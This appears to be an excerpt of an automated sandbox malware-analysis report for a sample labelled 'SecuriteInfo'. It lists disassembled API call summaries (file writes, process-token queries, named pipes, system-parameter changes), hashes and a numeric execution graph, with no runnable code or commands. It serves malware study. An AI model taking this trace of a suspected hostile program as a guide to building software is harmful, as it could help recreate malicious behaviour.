                                                          • Part of subcall function 00C90654: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C9477B,?,00000000,-00000008), ref: 00C906B5
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C94D52
                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C94D98
                                                        • GetLastError.KERNEL32 ref: 00C94E3B
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                        • String ID:
                                                        • API String ID: 2112829910-0
                                                        • Opcode ID: 5bf2617c1564edb28a1ccbfe5ea5abfddef351f6b1d0bdb16820d83a6ffbd1c9
                                                        • Instruction ID: fcdcf28c279a1ffde0380c7807f97471a8757297e5b051e978f44363d1d79548
                                                        • Opcode Fuzzy Hash: 5bf2617c1564edb28a1ccbfe5ea5abfddef351f6b1d0bdb16820d83a6ffbd1c9
                                                        • Instruction Fuzzy Hash: 30D17C75D002589FCF19CFA8D884AADFBB5FF09314F28456AE526EB351D730AA42CB50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AdjustPointer
                                                        • String ID:
                                                        • API String ID: 1740715915-0
                                                        • Opcode ID: 9e64acd58e1094d3a4db8520bc6b237477e1daf1c8d5b1c8935325b8f3a1a7a8
                                                        • Instruction ID: 115e29ba8f22341224303c14c2be7287a3430ae991a1ae997694790bc7272363
                                                        • Opcode Fuzzy Hash: 9e64acd58e1094d3a4db8520bc6b237477e1daf1c8d5b1c8935325b8f3a1a7a8
                                                        • Instruction Fuzzy Hash: 94510BB26013029FDB28BF14CC51BBA77A4EF80718F54412DE91257991EF31ED48D798
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000008,?), ref: 00C824CC
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00C824D3
                                                        • GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00C824F3
                                                        • CloseHandle.KERNEL32(?), ref: 00C82502
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                        • String ID:
                                                        • API String ID: 215268677-0
                                                        • Opcode ID: 9208ebbed50056fd54bf5e979cd459130708abd18264e9f3aa24a33578427651
                                                        • Instruction ID: 1c181df58686ab2065d73802faf2d639f34670ed36844e8c19fb4d0a5f0412fd
                                                        • Opcode Fuzzy Hash: 9208ebbed50056fd54bf5e979cd459130708abd18264e9f3aa24a33578427651
                                                        • Instruction Fuzzy Hash: C301EC71A0021CABDB10EFA4DC0DBBEBBB8FF09705F404559EA21E7150DB309A14DB95
                                                        APIs
                                                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00C96320,00000000,00000001,?,?,?,00C94E8F,?,00000000,00000000), ref: 00C971CD
                                                        • GetLastError.KERNEL32(?,00C96320,00000000,00000001,?,?,?,00C94E8F,?,00000000,00000000,?,?,?,00C95432,00000000), ref: 00C971D9
                                                          • Part of subcall function 00C9719F: CloseHandle.KERNEL32(FFFFFFFE,00C971E9,?,00C96320,00000000,00000001,?,?,?,00C94E8F,?,00000000,00000000,?,?), ref: 00C971AF
                                                        • ___initconout.LIBCMT ref: 00C971E9
                                                          • Part of subcall function 00C97161: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C97190,00C9630D,?,?,00C94E8F,?,00000000,00000000,?), ref: 00C97174
                                                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00C96320,00000000,00000001,?,?,?,00C94E8F,?,00000000,00000000,?), ref: 00C971FE
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                        • String ID:
                                                        • API String ID: 2744216297-0
                                                        • Opcode ID: 44e870ea42d40f63d5b2c0662265e7f086293656f33ff6948c461e411a3ba269
                                                        • Instruction ID: 4d73fd070c3d982694fb2bb88e4fc83dc5637ec09b0b840331e428c2b14c737f
                                                        • Opcode Fuzzy Hash: 44e870ea42d40f63d5b2c0662265e7f086293656f33ff6948c461e411a3ba269
                                                        • Instruction Fuzzy Hash: 81F0A236515628FFCF222F99EC0CB9D3F65FB09361F054115F92895130C6328920EB91
                                                        APIs
                                                        • EncodePointer.KERNEL32(00000000,?), ref: 00C89085
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: EncodePointer
                                                        • String ID: MOC$RCC
                                                        • API String ID: 2118026453-2084237596
                                                        • Opcode ID: 48b9df5f4ca20864c6115093593e7216079cde6a42b2eb1c6e2eedc5cd02470c
                                                        • Instruction ID: b4e0a18ba803f20dc25458df51a11f1afb17bc1a1f23c4d95d13cb5c0adf3f10
                                                        • Opcode Fuzzy Hash: 48b9df5f4ca20864c6115093593e7216079cde6a42b2eb1c6e2eedc5cd02470c
                                                        • Instruction Fuzzy Hash: CF41AB3190020AAFCF16EF98CC89AEEBBB1FF48308F188199F91577215D335AA51DB55

                                                        Execution Graph

                                                        Execution Coverage: 5.4%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 8.6%
                                                        Total number of Nodes: 2000
                                                        Total number of Limit Nodes: 118
                                                        execution_graph 82783 6c804e60 82784 6c804e65 82783->82784 82785 6c804e71 Sleep 82784->82785 82786 6c804e69 WSACancelBlockingCall 82784->82786 82787 1104b884 82833 11049df0 82787->82833 82790 1104ba98 GetDC 82932 11059580 82790->82932 82791 1104b9a7 CreateEventA 82794 1104b9d2 82791->82794 82795 1104b9bb 82791->82795 82792 1104b919 82792->82790 82796 1104b925 82792->82796 82878 11102870 82794->82878 82877 11027fb0 265 API calls 2 library calls 82795->82877 82856 110ae410 82796->82856 82797 1104bac4 GetACP 82821 1104bb03 82797->82821 82803 1104b92a wsprintfA CreateFileA 82806 1104b983 SetNamedPipeHandleState 82803->82806 82807 1104b968 GetLastError 82803->82807 82805 1104b9fd 82811 11102870 std::locale::facet::_Facet_Register 265 API calls 82805->82811 82806->82790 82871 111356e0 82807->82871 82812 1104ba15 82811->82812 82813 1104ba33 82812->82813 82814 1104ba29 82812->82814 82922 11102700 82813->82922 82915 11102970 82814->82915 82818 1104bd4d 82820 1104ba8b GetPriorityClass 82820->82790 82822 1104bb65 ReleaseDC GetSystemMetrics GetSystemMetrics 82821->82822 82942 1108e4d0 6 API calls 82822->82942 82824 1104bb91 82825 1104bbd0 82824->82825 82829 1104bc66 82824->82829 82943 1108ea80 5 API calls _memset 82825->82943 82827 1104bbdb 82944 1108e460 FreeLibrary _memset std::ios_base::_Tidy 82827->82944 82828 1104b97c 82945 11150781 82828->82945 82829->82828 82832 111356e0 std::locale::facet::_Facet_Register 21 API calls 82829->82832 82831 1104bc64 82831->82829 82832->82828 82953 11048b00 82833->82953 82835 11049e01 82836 11049e67 CloseHandle 82835->82836 82837 11049e58 82835->82837 82853 11049e62 82835->82853 82840 11049e79 Sleep 82836->82840 82836->82853 82842 111356e0 std::locale::facet::_Facet_Register 21 API calls 82837->82842 82838 11049eca std::ios_base::_Tidy 82845 11049ed3 82838->82845 82969 1103a370 87 API calls 2 library calls 82838->82969 82839 11049f13 82847 11049f1e CloseHandle 82839->82847 82848 
11049f2b 82839->82848 82840->82853 82841 11049eb9 82841->82845 82846 11049ec3 82841->82846 82842->82853 82844 11049ea0 SetEvent 82967 111027f0 WaitForSingleObject 82844->82967 82845->82838 82845->82839 82968 111029d0 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 82846->82968 82847->82848 82848->82790 82848->82791 82848->82792 82849 11049ee6 82852 11049f00 CloseHandle 82849->82852 82970 11103160 278 API calls 2 library calls 82849->82970 82852->82839 82853->82841 82853->82844 82853->82845 82855 11049ef7 std::ios_base::_Tidy 82855->82852 82857 110ae423 GetModuleHandleA GetProcAddress 82856->82857 82858 110ae4e4 82856->82858 82859 110ae46a GetCurrentProcessId OpenProcess 82857->82859 82860 110ae44f GetCurrentProcessId 82857->82860 82858->82803 82861 110ae4b7 82859->82861 82862 110ae487 OpenProcessToken 82859->82862 82863 110ae458 82860->82863 82867 110ae4d3 CloseHandle 82861->82867 82868 110ae4d6 82861->82868 82862->82861 82864 110ae498 82862->82864 82863->82859 82865 110ae45c 82863->82865 82864->82861 82866 110ae49f GetTokenInformation 82864->82866 82865->82803 82866->82861 82867->82868 82869 110ae4da CloseHandle 82868->82869 82870 110ae4dd 82868->82870 82869->82870 82870->82858 82872 111356f1 82871->82872 82873 111356ec 82871->82873 83507 11134c20 82872->83507 83506 111349d0 18 API calls std::locale::facet::_Facet_Register 82873->83506 82879 111515d1 _malloc 66 API calls 82878->82879 82880 1110288e 82879->82880 82881 11102897 wsprintfA 82880->82881 82884 111028c3 _memset 82880->82884 83531 11027fb0 265 API calls 2 library calls 82881->83531 82885 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 82884->82885 82886 1104b9d9 82885->82886 82886->82805 82887 111035c0 82886->82887 82888 11102870 std::locale::facet::_Facet_Register 265 API calls 82887->82888 82889 111035f1 82888->82889 82890 11103613 GetCurrentThreadId InitializeCriticalSection 82889->82890 82891 11102870 
std::locale::facet::_Facet_Register 265 API calls 82889->82891 82894 11103680 EnterCriticalSection 82890->82894 82895 11103673 InitializeCriticalSection 82890->82895 82893 1110360c 82891->82893 82893->82890 83532 11150c1a 66 API calls std::exception::_Copy_str 82893->83532 82896 1110373a LeaveCriticalSection 82894->82896 82897 111036ae CreateEventA 82894->82897 82895->82894 82896->82805 82899 111036c1 82897->82899 82900 111036d8 82897->82900 83534 11027fb0 265 API calls 2 library calls 82899->83534 82901 11102870 std::locale::facet::_Facet_Register 265 API calls 82900->82901 82905 111036df 82901->82905 82902 1110362f 83533 11151071 RaiseException 82902->83533 82907 111036fc 82905->82907 82908 111035c0 417 API calls 82905->82908 82909 11102870 std::locale::facet::_Facet_Register 265 API calls 82907->82909 82908->82907 82910 1110370c 82909->82910 82911 1110371d 82910->82911 82912 11102970 3 API calls 82910->82912 82913 11102700 417 API calls 82911->82913 82912->82911 82914 11103735 82913->82914 82914->82896 82916 11102986 CreateEventA 82915->82916 82917 11102999 82915->82917 82916->82917 82918 111029a7 82917->82918 83535 111026b0 InterlockedIncrement 82917->83535 82920 111029b9 82918->82920 83536 11102810 InterlockedIncrement 82918->83536 82920->82813 82923 11102720 CreateThread 82922->82923 82924 1110270f CreateEventA 82922->82924 82926 11102746 82923->82926 82927 1110275d 82923->82927 83538 111032d0 82923->83538 83552 11025fa0 82923->83552 83576 1102adc0 82923->83576 83611 110f6330 82923->83611 82924->82923 83537 11027fb0 265 API calls 2 library calls 82926->83537 82929 11102761 WaitForSingleObject CloseHandle 82927->82929 82930 1104ba54 CloseHandle GetWindowThreadProcessId OpenProcess 82927->82930 82929->82930 82930->82820 82930->82828 82933 110595af 82932->82933 82934 110595d5 82933->82934 82935 110595b5 82933->82935 82937 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 82934->82937 82936 111520cb 
__wcstoi64 79 API calls 82935->82936 82938 110595c2 82936->82938 82939 110595e2 82937->82939 82940 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 82938->82940 82939->82797 82941 110595cf 82940->82941 82941->82797 82942->82824 82943->82827 82944->82831 82946 11150789 82945->82946 82947 1115078b IsDebuggerPresent 82945->82947 82946->82818 83888 11165e37 82947->83888 82950 1115a679 SetUnhandledExceptionFilter UnhandledExceptionFilter 82951 1115a696 __call_reportfault 82950->82951 82952 1115a69e GetCurrentProcess TerminateProcess 82950->82952 82951->82952 82952->82818 82954 11048b16 82953->82954 82955 11048bef 82953->82955 82956 11048bce 82954->82956 82957 11048b25 82954->82957 82955->82835 82956->82955 82971 110480c0 82956->82971 82959 11048ba4 82957->82959 82960 11048b93 82957->82960 82962 110480c0 837 API calls 82959->82962 83118 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 82960->83118 82964 11048bbc 82962->82964 82963 11048b9b 82963->82835 83119 11037ba0 121 API calls 2 library calls 82964->83119 82966 11048bc8 82966->82835 82967->82853 82968->82838 82969->82849 82970->82855 82972 11048145 IsWindow 82971->82972 82973 1104835f 82971->82973 82972->82973 82984 11048154 82972->82984 82974 110483a1 82973->82974 82977 11048367 82973->82977 82978 110483a3 82973->82978 82975 110485fc 82974->82975 82976 110483e9 82974->82976 82979 11048604 82975->82979 82980 1104890f 82975->82980 82981 11048405 82976->82981 82999 110485bd 82976->82999 82977->82974 82977->82975 83182 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 82977->83182 82978->82974 82978->82975 83184 110397c0 92 API calls 82978->83184 82982 1104864e 82979->82982 82987 11059580 79 API calls 82979->82987 82994 11048954 82980->82994 83001 11059580 79 API calls 82980->83001 82983 11048409 82981->82983 83009 1104843d 82981->83009 
83025 11048676 82982->83025 83120 1103f3e0 82982->83120 82989 11048431 82983->82989 82990 11048412 82983->82990 82984->82973 83153 110a7ce0 265 API calls 82984->83153 82995 11048633 82987->82995 82988 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 82996 11048abe 82988->82996 83188 11045ae0 309 API calls 82989->83188 83186 11045ae0 309 API calls 82990->83186 82993 110483cb 83185 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 82993->83185 83210 1103ae60 636 API calls 2 library calls 82994->83210 82995->82982 83011 11059580 79 API calls 82995->83011 82996->82955 82998 11048393 83183 110397c0 92 API calls 82998->83183 83005 11048438 82999->83005 83197 110ab090 EnterCriticalSection LeaveCriticalSection SetEvent LeaveCriticalSection LeaveCriticalSection 82999->83197 83008 11048946 83001->83008 83003 11048419 83187 1103ae60 636 API calls 2 library calls 83003->83187 83005->82988 83008->82994 83209 11045ae0 309 API calls 83008->83209 83017 11048527 83009->83017 83189 11045ae0 309 API calls 83009->83189 83010 1104895e 83013 11048967 83010->83013 83014 11048971 83010->83014 83011->82982 83211 11116ea0 15 API calls 83013->83211 83142 11121170 IsWindow PostMessageA 83014->83142 83015 1104842c 83015->83005 83016 110486df 83018 110486ce 83016->83018 83199 11045ae0 309 API calls 83016->83199 83191 1103ae60 636 API calls 2 library calls 83017->83191 83035 11048714 83018->83035 83036 1104872b 83018->83036 83023 11048187 83049 11048205 83023->83049 83050 1104821c 83023->83050 83024 110486c0 83198 11045ae0 309 API calls 83024->83198 83025->83016 83025->83024 83031 11059580 79 API calls 83025->83031 83028 1104896e 83028->83014 83029 11048540 83029->83005 83037 1104856f 83029->83037 83041 1104855f Sleep 83029->83041 83030 11048977 83038 1104898c 83030->83038 83086 110489eb 83030->83086 83143 110397c0 92 API calls 83030->83143 83034 110486bc 83031->83034 83033 
11048496 83033->83017 83070 110484be 83033->83070 83034->83016 83034->83024 83200 11027fb0 265 API calls 2 library calls 83035->83200 83201 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 83036->83201 83192 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 83037->83192 83038->83030 83041->83029 83041->83037 83046 11048734 83202 1103e560 301 API calls 83046->83202 83047 11048578 83053 11048584 83047->83053 83054 1104859e 83047->83054 83048 110489b7 83144 11101f00 278 API calls std::locale::facet::_Facet_Register 83048->83144 83154 11027fb0 265 API calls 2 library calls 83049->83154 83155 111515d1 83050->83155 83051 11048a0f 83059 11048a19 PostMessageA 83051->83059 83193 110ece70 92 API calls 3 library calls 83053->83193 83195 110397c0 92 API calls 83054->83195 83071 11048a3d 83059->83071 83060 1104873c 83065 1104877c 83060->83065 83066 1104874d 83060->83066 83062 110489cd 83212 111202d0 SetTimer KillTimer GetDlgItem EnableWindow 83062->83212 83073 110487c6 83065->83073 83085 11059580 79 API calls 83065->83085 83203 111202d0 SetTimer KillTimer GetDlgItem EnableWindow 83066->83203 83067 11048590 83194 11037ba0 121 API calls 2 library calls 83067->83194 83069 110485ac 83196 11037ba0 121 API calls 2 library calls 83069->83196 83070->83005 83190 110342d0 8 API calls 83070->83190 83071->83005 83079 11048a46 PostMessageA PostMessageA PostMessageA PostMessageA PostMessageA 83071->83079 83206 1103ae60 636 API calls 2 library calls 83073->83206 83075 110489d3 83075->83086 83145 11127610 83075->83145 83078 11048249 83172 11027fb0 265 API calls 2 library calls 83078->83172 83079->83005 83080 11048754 83204 11101f00 278 API calls std::locale::facet::_Facet_Register 83080->83204 83090 110487a3 83085->83090 83213 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 83086->83213 83087 11048260 83091 
1104825d 83087->83091 83101 1104829b _memmove 83087->83101 83088 110484fd 83092 111356e0 std::locale::facet::_Facet_Register 21 API calls 83088->83092 83089 1104876b 83205 110397c0 92 API calls 83089->83205 83090->83073 83097 11059580 79 API calls 83090->83097 83091->83087 83173 11027fb0 265 API calls 2 library calls 83091->83173 83092->83005 83094 110488b4 83208 11121170 IsWindow PostMessageA 83094->83208 83096 11048779 83096->83065 83099 110487be 83097->83099 83099->83073 83099->83094 83100 110488bb 83102 110488f1 GetTickCount 83100->83102 83107 11059580 79 API calls 83100->83107 83103 110482f1 SendMessageTimeoutA 83101->83103 83104 11048298 83101->83104 83102->83059 83175 11151665 83103->83175 83104->83101 83174 11027fb0 265 API calls 2 library calls 83104->83174 83110 110488e6 83107->83110 83109 1104834a 83181 110a8410 267 API calls std::locale::facet::_Facet_Register 83109->83181 83110->83102 83111 110488ea MessageBeep 83110->83111 83111->83102 83112 110487d2 83112->83094 83207 110342d0 8 API calls 83112->83207 83115 1104888a 83116 111356e0 std::locale::facet::_Facet_Register 21 API calls 83115->83116 83117 1104889b 83116->83117 83117->83094 83118->82963 83119->82966 83121 1103f412 83120->83121 83122 1103f418 83121->83122 83129 1103f434 83121->83129 83123 110ef160 15 API calls 83122->83123 83125 1103f42a CloseHandle 83123->83125 83124 1103f548 83126 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83124->83126 83125->83129 83128 1103f555 83126->83128 83127 1103f4c8 83214 110ef160 GetTokenInformation 83127->83214 83128->83025 83129->83124 83132 1103f46d 83129->83132 83224 110827b0 297 API calls 5 library calls 83129->83224 83132->83124 83132->83127 83133 1103f4da 83134 1103f4e2 CloseHandle 83133->83134 83137 1103f4e9 83133->83137 83134->83137 83135 1103f52b 83138 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83135->83138 83136 1103f511 
83139 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83136->83139 83137->83135 83137->83136 83140 1103f544 83138->83140 83141 1103f527 83139->83141 83140->83025 83141->83025 83142->83030 83143->83048 83144->83062 83146 1112767d 83145->83146 83147 1112761c 83145->83147 83146->83086 83148 11059580 79 API calls 83147->83148 83150 11127635 83148->83150 83149 1112765d 83149->83146 83238 11120190 144 API calls std::locale::facet::_Facet_Register 83149->83238 83150->83146 83150->83149 83226 111204d0 83150->83226 83153->83023 83156 1115164e 83155->83156 83169 111515df 83155->83169 83499 1115be88 DecodePointer 83156->83499 83158 11151654 83500 11157ccf 66 API calls __getptd_noexit 83158->83500 83161 1115160d RtlAllocateHeap 83161->83169 83171 11048228 83161->83171 83163 1115163a 83497 11157ccf 66 API calls __getptd_noexit 83163->83497 83167 11151638 83498 11157ccf 66 API calls __getptd_noexit 83167->83498 83168 111515ea 83168->83169 83493 1115c37d 66 API calls __NMSG_WRITE 83168->83493 83494 1115c1ce 66 API calls 6 library calls 83168->83494 83495 1115bf0d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83168->83495 83169->83161 83169->83163 83169->83167 83169->83168 83496 1115be88 DecodePointer 83169->83496 83171->83078 83171->83087 83176 11151670 HeapFree 83175->83176 83177 11151699 __dosmaperr 83175->83177 83176->83177 83178 11151685 83176->83178 83177->83109 83501 11157ccf 66 API calls __getptd_noexit 83178->83501 83180 1115168b GetLastError 83180->83177 83181->82973 83182->82998 83183->82974 83184->82993 83185->82974 83186->83003 83187->83015 83502 11117ef0 315 API calls 2 library calls 83187->83502 83188->83005 83189->83033 83190->83088 83191->83029 83503 11117ef0 315 API calls 2 library calls 83191->83503 83192->83047 83193->83067 83194->83015 83195->83069 83196->83015 83197->83005 83198->83018 83199->83018 83201->83046 83202->83060 83203->83080 83204->83089 83205->83096 83206->83112 83504 
11117ef0 315 API calls 2 library calls 83206->83504 83207->83115 83208->83100 83209->82994 83210->83010 83505 11117ef0 315 API calls 2 library calls 83210->83505 83211->83028 83212->83075 83213->83051 83215 110ef1a8 83214->83215 83216 110ef197 83214->83216 83225 110e6e20 9 API calls 83215->83225 83217 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83216->83217 83219 110ef1a4 83217->83219 83219->83133 83220 110ef1cc 83220->83216 83221 110ef1d4 83220->83221 83222 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83221->83222 83223 110ef1fa 83222->83223 83223->83133 83224->83132 83225->83220 83227 111204dd 83226->83227 83233 11120569 83226->83233 83228 11120518 83227->83228 83239 11108cb0 83227->83239 83230 11120532 83228->83230 83303 1110e3d0 83228->83303 83230->83233 83235 11059580 79 API calls 83230->83235 83231 11120509 83285 11108f70 83231->83285 83233->83149 83236 11120554 83235->83236 83236->83233 83418 11109440 83236->83418 83238->83146 83240 11108cd4 83239->83240 83241 11108f4a 83239->83241 83242 11108cdc 83240->83242 83243 11108e6d SystemParametersInfoA 83240->83243 83244 11134650 std::locale::facet::_Facet_Register 90 API calls 83241->83244 83245 11108dd0 83242->83245 83428 11134650 83242->83428 83247 11108e98 83243->83247 83246 11108f58 83244->83246 83248 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83245->83248 83249 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83246->83249 83252 11108f23 SystemParametersInfoA 83247->83252 83253 11108eac 83247->83253 83250 11108ddf 83248->83250 83251 11108f66 83249->83251 83250->83231 83251->83231 83254 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83252->83254 83256 11132450 std::locale::facet::_Facet_Register 
RegQueryValueExA 83253->83256 83257 11108f44 83254->83257 83261 11108ed4 83256->83261 83257->83231 83259 11108f04 RegCloseKey 83264 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83259->83264 83260 11108de5 SystemParametersInfoA 83262 11108e5e SystemParametersInfoA 83260->83262 83263 11108dfe 83260->83263 83261->83259 83435 11152c8a 79 API calls __isdigit_l 83261->83435 83262->83245 83267 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83263->83267 83268 11108f1d 83264->83268 83265 11108d17 83265->83245 83431 11132450 RegQueryValueExA 83265->83431 83271 11108e2a 83267->83271 83268->83231 83270 11108eee 83270->83259 83273 11108ef5 SystemParametersInfoA 83270->83273 83274 11108dc9 RegCloseKey 83271->83274 83434 11152c8a 79 API calls __isdigit_l 83271->83434 83273->83259 83274->83245 83275 11108d68 83278 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83275->83278 83276 11108d56 SystemParametersInfoA 83276->83275 83279 11108d94 83278->83279 83279->83274 83433 11152c8a 79 API calls __isdigit_l 83279->83433 83280 11108e44 83280->83274 83281 11108e4f SystemParametersInfoA 83280->83281 83281->83274 83283 11108dae 83283->83274 83284 11108db5 SystemParametersInfoA 83283->83284 83284->83274 83286 11134650 std::locale::facet::_Facet_Register 90 API calls 83285->83286 83287 11108f8e 83286->83287 83288 11108fb5 83287->83288 83290 11108f98 83287->83290 83291 11134460 std::locale::facet::_Facet_Register 90 API calls 83287->83291 83289 11108fc4 CoInitialize CoCreateInstance 83288->83289 83288->83290 83292 11108ff4 LoadLibraryA 83289->83292 83296 11108fe9 83289->83296 83293 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83290->83293 83291->83288 83295 11109010 GetProcAddress 83292->83295 83292->83296 83294 11108fa6 83293->83294 83294->83228 83299 11109020 SHGetSettings 83295->83299 83300 11109034 FreeLibrary 83295->83300 83297 
111090d1 CoUninitialize 83296->83297 83298 111090d7 83296->83298 83297->83298 83301 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83298->83301 83299->83300 83300->83296 83302 111090e6 83301->83302 83302->83228 83304 1110e3f0 83303->83304 83309 1110e403 83303->83309 83305 11059580 79 API calls 83304->83305 83305->83309 83306 1110e443 SystemParametersInfoA 83308 1110e44c 83306->83308 83307 1110e40f 83307->83308 83311 11134650 std::locale::facet::_Facet_Register 90 API calls 83307->83311 83310 1110e478 83308->83310 83312 11059580 79 API calls 83308->83312 83309->83306 83309->83307 83309->83308 83313 1110e484 83310->83313 83314 1110e4ab SystemParametersInfoA 83310->83314 83316 1110e4bd 83310->83316 83315 1110e41c 83311->83315 83312->83310 83313->83316 83319 1110e496 SystemParametersInfoA 83313->83319 83314->83316 83317 1110e420 GetSystemMetrics 83315->83317 83318 1110e42c 83315->83318 83320 1110e4dc 83316->83320 83324 11059580 79 API calls 83316->83324 83317->83308 83317->83318 83318->83308 83321 1110e431 SystemParametersInfoA 83318->83321 83319->83316 83322 1110e4e8 83320->83322 83323 1110e50c SystemParametersInfoA 83320->83323 83325 1110e51b 83320->83325 83321->83308 83322->83325 83326 1110e4f7 SystemParametersInfoA 83322->83326 